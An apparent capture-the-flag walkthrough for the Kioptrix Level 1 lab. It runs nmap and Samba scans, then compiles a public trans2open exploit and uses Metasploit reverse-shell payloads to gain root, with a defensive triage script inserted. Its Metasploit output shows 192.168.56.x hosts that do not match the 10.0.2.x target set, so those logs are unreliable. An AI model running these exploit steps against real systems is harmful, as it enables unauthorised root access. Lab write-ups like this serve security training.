Once you have found the vulnerabilities in Kioptrix Level 1, the path to root is short. Here are two methods to root the machine: remote code execution with a standalone exploit, and the Metasploit remote buffer overflow module (Samba trans2open).
Get the IP address:
$ netdiscover -r 10.0.2.1/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.3 08:00:27:1f:b8:8b 1 60 PCS Systemtechnik GmbH
10.0.2.11 08:00:27:a8:3b:ba 1 60 PCS Systemtechnik GmbH
$ ping -c 1 10.0.2.11
PING 10.0.2.11 (10.0.2.11) 56(84) bytes of data.
64 bytes from 10.0.2.11: icmp_seq=1 ttl=255 time=2.15 ms
--- 10.0.2.11 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 2.154/2.154/2.154/0.000 ms
Scan with nmap:
$ nmap -vvv -Pn -sCV -p0-65535 --reason -T4 -oN nmap/kioptrix1.nmap 10.0.2.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 14:33 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 0.00s elapsed
Initiating ARP Ping Scan at 14:33
Scanning 10.0.2.11 [1 port]
Completed ARP Ping Scan at 14:33, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:33
Completed Parallel DNS resolution of 1 host. at 14:33, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:33
Scanning 10.0.2.11 [65536 ports]
Discovered open port 80/tcp on 10.0.2.11
Discovered open port 443/tcp on 10.0.2.11
Discovered open port 139/tcp on 10.0.2.11
Discovered open port 22/tcp on 10.0.2.11
Discovered open port 111/tcp on 10.0.2.11
Discovered open port 32768/tcp on 10.0.2.11
Completed SYN Stealth Scan at 14:33, 3.89s elapsed (65536 total ports)
Initiating Service scan at 14:33
Scanning 6 services on 10.0.2.11
Completed Service scan at 14:33, 6.11s elapsed (6 services on 1 host)
NSE: Script scanning 10.0.2.11.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 10.24s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 1.23s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:33
Completed NSE at 14:33, 0.01s elapsed
Nmap scan report for 10.0.2.11
Host is up, received arp-response (0.00013s latency).
Scanned at 2022-09-11 14:33:29 EDT for 21s
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
| 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp open http syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after: 2010-09-26T09:32:06
| MD5: 78ce 5293 4723 e7fe c28d 74ab 42d7 02f1
| SHA-1: 9c42 91c3 bed2 a95b 983d 10ac f766 ecb9 8766 1d33
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_ssl-date: 2022-09-11T22:33:49+00:00; +3h59m59s from scanner time.
| http-methods:
|_ Supported Methods: GET HEAD POST
32768/tcp open status syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:A8:3B:BA (Oracle VirtualBox virtual NIC)
Host script results:
|_clock-skew: 3h59m58s
|_smb2-time: Protocol negotiation failed (SMB2)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 64050/tcp): CLEAN (Couldn't connect)
| Check 2 (port 35315/tcp): CLEAN (Couldn't connect)
| Check 3 (port 30121/udp): CLEAN (Failed to receive data)
| Check 4 (port 47139/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| MYGROUP<00> Flags: <group><active>
| MYGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
After checking port 80 and not finding much of anything, look into port 139. Use Metasploit to scan for the Samba version.
msf6 > search smb_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.2.11
RHOSTS => 10.0.2.11
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.2.11:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.0.2.11:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.0.2.11: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
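As an added example that is not part of the original walkthrough, here is a small Python triage script that parses the service lines from the nmap output above, plus the Samba version string that smb_version reported, and flags the legacy settings a defender would want to fix first: Samba older than 2.2.8 (the trans2open range), SSH protocol 1, SSLv2, HTTP TRACE and the Apache 1.3 branch. The sample input is constructed from the output shown above; the version thresholds are my own assumptions.

```python
import re

# Constructed sample input: the service lines from the nmap scan above plus
# the version string that the Metasploit smb_version scanner reported.
NMAP_OUTPUT = """\
22/tcp open ssh syn-ack ttl 64 OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
| SSLv2 supported
"""
SMB_VERSION_LINE = "[*] 10.0.2.11:139 - Host could not be identified: Unix (Samba 2.2.1a)"

# Matches the "PORT STATE SERVICE REASON VERSION" lines of nmap -oN output.
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+\S+\s+ttl\s+\d+\s+(.*)$")

def version_tuple(text):
    """Turn '2.2.1a' into (2, 2, 1, 'a') so versions compare numerically."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)([a-z]?)", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))

def triage(nmap_output, smb_version_line):
    """Return {port: [finding, ...]} for the legacy services this host exposes."""
    findings = {}
    current_port = None
    for line in nmap_output.splitlines():
        m = PORT_RE.match(line)
        if m:
            current_port = int(m.group(1))
            findings.setdefault(current_port, [])
            apache = re.search(r"Apache(?: httpd)?/?\s*(\d+\.\d+\.\d+)", m.group(3))
            if apache and version_tuple(apache.group(1)) < (2, 0, 0, ""):
                findings[current_port].append("Apache 1.3 branch (no longer maintained)")
            continue
        # NSE script output lines belong to the most recent port line.
        if current_port is None:
            continue
        if "Server supports SSHv1" in line:
            findings[current_port].append("SSH protocol 1 enabled")
        elif "SSLv2 supported" in line:
            findings[current_port].append("SSLv2 enabled")
        elif "Potentially risky methods: TRACE" in line:
            findings[current_port].append("HTTP TRACE method enabled")
    # Samba version comes from the Metasploit scanner, not from nmap.
    m = re.search(r"Samba (\d+\.\d+\.\d+[a-z]?)", smb_version_line)
    if m and version_tuple(m.group(1)) < (2, 2, 8, ""):
        findings.setdefault(139, []).append(
            "Samba %s is older than 2.2.8 (trans2open overflow range)" % m.group(1))
    return findings

if __name__ == "__main__":
    for port, notes in sorted(triage(NMAP_OUTPUT, SMB_VERSION_LINE).items()):
        for note in notes:
            print("%5d/tcp  %s" % (port, note))
```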
A Google search turns up this exploit:
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
Download the exploit code and compile it in Kali. It's written in C.
$ gcc 10.c -o 10
$ ll
total 88K
-rwxr-xr-x 1 root root 40K Sep 11 16:01 10*
-rw-r--r-- 1 root root 45K Sep 11 16:00 10.c
The comments at the top of the file tell you how to run it.
$ ./10 -b 0 -v 10.0.2.11
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
hostname
kioptrix.level1
which python
/usr/bin/python
cd /root
So that was a very quick path to root.
We can't upgrade the shell with Python; the target's Python 1.5 pty.spawn fails with a termios error:
python -c 'import pty; pty.spawn("/bin/bash")'
Traceback (innermost last):
File "<string>", line 1, in ?
File "/usr/lib/python1.5/pty.py", line 101, in spawn
mode = tty.tcgetattr(STDIN_FILENO)
termios.error: (22, 'Invalid argument')
Checking man bash, you will see the -i option: "If the -i option is present, the shell is interactive." You can do the same thing with sh.
/bin/bash -i
bash: no job control in this shell
[root@kioptrix root]# cd /home
cd /home
[root@kioptrix home]#
There are two users in /home.
[root@kioptrix home]# ll
ll
total 24
drwx------ 2 harold harold 4096 Sep 26 2009 harold
drwx------ 2 john john 4096 Sep 26 2009 john
drwxr-xr-x 2 root root 16384 Sep 26 2009 lost+found
[root@kioptrix home]# ls -la harold
ls -la harold
total 28
drwx------ 2 harold harold 4096 Sep 26 2009 .
drwxr-xr-x 5 root root 4096 Sep 26 2009 ..
-rw-r--r-- 1 harold harold 24 Sep 26 2009 .bash_logout
-rw-r--r-- 1 harold harold 191 Sep 26 2009 .bash_profile
-rw-r--r-- 1 harold harold 124 Sep 26 2009 .bashrc
-rw-r--r-- 1 harold harold 820 Sep 26 2009 .emacs
-rw-r--r-- 1 harold harold 3511 Sep 26 2009 .screenrc
[root@kioptrix home]# ls -la john
ls -la john
total 32
drwx------ 2 john john 4096 Sep 26 2009 .
drwxr-xr-x 5 root root 4096 Sep 26 2009 ..
-rw------- 1 john john 3 Sep 26 2009 .bash_history
-rw-r--r-- 1 john john 24 Sep 26 2009 .bash_logout
-rw-r--r-- 1 john john 191 Sep 26 2009 .bash_profile
-rw-r--r-- 1 john john 124 Sep 26 2009 .bashrc
-rw-r--r-- 1 john john 820 Sep 26 2009 .emacs
-rw-r--r-- 1 john john 3511 Sep 26 2009 .screenrc
[root@kioptrix home]# su - john
su - john
whoami
john
/bin/sh -i
sh: no job control in this shell
sh-2.05$ pwd
pwd
/home/john
sh-2.05$ exit
exit
exit
exit
[root@kioptrix home]# exit
exit
exit
/bin/sh -i
sh: no job control in this shell
sh-2.05#
Exit that shell back to Kali and dig a little more into Samba.
$ searchsploit samba 2.2
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution | linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We see trans2open listed several times. Go back to msfconsole to find the module you can use.
msf6 > search trans2open
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
1 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
2 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
3 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
Interact with a module by name or index. For example info 3, use 3 or use exploit/solaris/samba/trans2open
Select the one for Linux (index 1) and check the options:
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
Set RHOSTS:
msf6 exploit(linux/samba/trans2open) > set RHOSTS 10.0.2.11
RHOSTS => 10.0.2.11
Check targets:
msf6 exploit(linux/samba/trans2open) > show targets
Exploit targets:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
Run the exploit:
msf6 exploit(linux/samba/trans2open) > exploit
[*] Started reverse TCP handler on 192.168.56.107:4444
[*] 192.168.56.110:139 - Trying return address 0xbffffdfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffcfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffbfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffafc...
[*] Sending stage (980808 bytes) to 192.168.56.110
[*] 192.168.56.110 - Meterpreter session 1 closed. Reason: Died
[*] Meterpreter session 1 opened (192.168.56.107:4444 -> 127.0.0.1) at 2021-12-11 11:37:42 -0500
[-] Meterpreter session 1 is not valid and will be closed
[*] 192.168.56.110:139 - Trying return address 0xbffff9fc...
[*] Sending stage (980808 bytes) to 192.168.56.110
[*] Meterpreter session 2 opened (192.168.56.107:4444 -> 192.168.56.110:32782) at 2021-12-11 11:37:43 -0500
[*] 192.168.56.110 - Meterpreter session 2 closed. Reason: Died
The staged Meterpreter session keeps dying, so switch to a non-staged payload instead:
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.110 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST 192.168.56.107 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
Run the exploit:
msf6 exploit(linux/samba/trans2open) > run
[*] Started reverse TCP handler on 192.168.56.107:4444
[*] 192.168.56.110:139 - Trying return address 0xbffffdfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffcfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffbfc...
[*] 192.168.56.110:139 - Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.56.107:4444 -> 192.168.56.110:32801) at 2021-12-11 11:50:18 -0500
whoami
root
hostname
kioptrix.level1
You land as root, and the machine is owned a second time.
Next: Kioptrix Level 2